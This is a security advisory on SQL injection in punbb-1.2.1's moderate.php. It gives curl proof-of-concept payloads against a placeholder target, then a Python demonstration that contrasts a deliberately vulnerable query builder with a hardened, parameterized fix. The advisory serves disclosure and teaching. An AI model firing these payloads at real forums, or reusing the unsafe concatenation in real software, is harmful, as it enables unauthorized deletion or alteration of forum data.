==============================================
SQL Injections in punbb-1.2.1 moderate.php
==============================================

Description
-----------

Improper handling of several arguments in moderate.php allows a malicious moderator (or admin) to inject arbitrary SQL statements. This also affects systems using the magic_quotes_gpc option in php.ini.

Proof of concept
----------------

These examples will not do anything malicious or even cause the system to report an error. Instead they are crafted such that simply adding a ; or ' just before the comment "-- this won't show" will cause the SQL query to fail, demonstrating that injection is possible.

Assumptions:

- punbb_cookie contains identification of a moderator for the forum with id 1.

Attacks delete posts:

    curl --referer http://target/moderate.php --form posts="0) -- this won't show" --form delete_posts_comply=1 --cookie punbb_cookie= target/moderate.php?fid=1\&tid=1

Attacks move topics:

    curl --referer http://target/moderate.php --form topics="2) -- this won't show" --form move_to_forum=2 --form move_topics=1 --form move_topics_to=1 --cookie punbb_cookie= target/moderate.php?fid=1

Attacks delete topics:

    curl --referer http://target/moderate.php --form topics="2) -- this won't show" --form delete_topics=1 --form delete_topics_comply=1 --cookie punbb_cookie= target/moderate.php?fid=1

Attacks open/close:

    curl --referer http://target/moderate.php --form "topics[0) -- this won't show]"= --form open=1 --cookie punbb_cookie= target/moderate.php?fid=1
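The following is an added illustration, not code from the advisory or from PunBB, of why the magic_quotes_gpc remark above matters and what the fix looks like. It reconstructs the vulnerable pattern as a hypothetical: a comma-separated id list from the form is only quote-escaped (the effect of magic_quotes_gpc / addslashes) and then concatenated into a numeric IN (...) clause, so a payload that needs no quote character still truncates the query at the comment. The hardened form validates every entry as a positive integer and binds the values through placeholders. The posts table and its three rows are constructed sample data, not PunBB's schema; SQLite stands in for MySQL.

```python
import re
import sqlite3

# Constructed sample data (not PunBB's real schema): two posts in topic 1, one in topic 2.
POSTS = [(1, 1, "first"), (2, 1, "second"), (3, 2, "third")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, topic_id INTEGER, message TEXT)")
    conn.executemany("INSERT INTO posts VALUES (?, ?, ?)", POSTS)
    conn.commit()
    return conn


def quote_escape(value):
    """Approximation of what magic_quotes_gpc / addslashes() does to a request value."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def build_delete_unsafe(posts, topic_id):
    """Hypothetical reconstruction of the vulnerable pattern: the form value is only
    quote-escaped and then concatenated into a numeric IN (...) list."""
    return ("DELETE FROM posts WHERE id IN (" + quote_escape(posts) + ")"
            " AND topic_id=" + str(int(topic_id)))


def run_unsafe(conn, posts, topic_id):
    """Execute the concatenated query. Returns (query_accepted, rows_deleted)."""
    sql = build_delete_unsafe(posts, topic_id)
    try:
        cur = conn.execute(sql)
    except sqlite3.Error:
        # This is the "crash" the advisory describes when a ; or ' is added.
        return False, 0
    conn.commit()
    return True, cur.rowcount


def parse_id_list(value):
    """Hardened input handling: accept only a comma-separated list of positive integers."""
    ids = []
    for part in value.split(","):
        part = part.strip()
        if not re.fullmatch(r"[1-9][0-9]*", part):
            raise ValueError("post id list contains a non-numeric entry: %r" % part)
        ids.append(int(part))
    return ids


def delete_posts_safe(conn, posts, topic_id):
    """Hardened form: validated integers are bound through placeholders, and the
    topic_id restriction can no longer be commented away."""
    ids = parse_id_list(posts)
    placeholders = ",".join("?" * len(ids))
    sql = "DELETE FROM posts WHERE id IN (%s) AND topic_id=?" % placeholders
    cur = conn.execute(sql, ids + [int(topic_id)])
    conn.commit()
    return cur.rowcount


if __name__ == "__main__":
    payload = "0) -- this won't show"
    # Quote escaping changes nothing: the payload contains no quote, and the
    # "--" comment swallows the rest of the statement, so the query is accepted.
    print(build_delete_unsafe(payload, 1))
    print(run_unsafe(make_db(), payload, 1))
    try:
        delete_posts_safe(make_db(), payload, 1)
    except ValueError as exc:
        print("rejected:", exc)
```

The escaped query in the first branch is accepted by the database even though magic_quotes_gpc would have been "on": the injected text contains no quote, so escaping has nothing to act on, which is exactly why the advisory notes the option does not help. Only the ' variant produces a syntax error, which is the harmless "crash" the proof-of-concept relies on. The hardened version rejects the payload before any SQL is built.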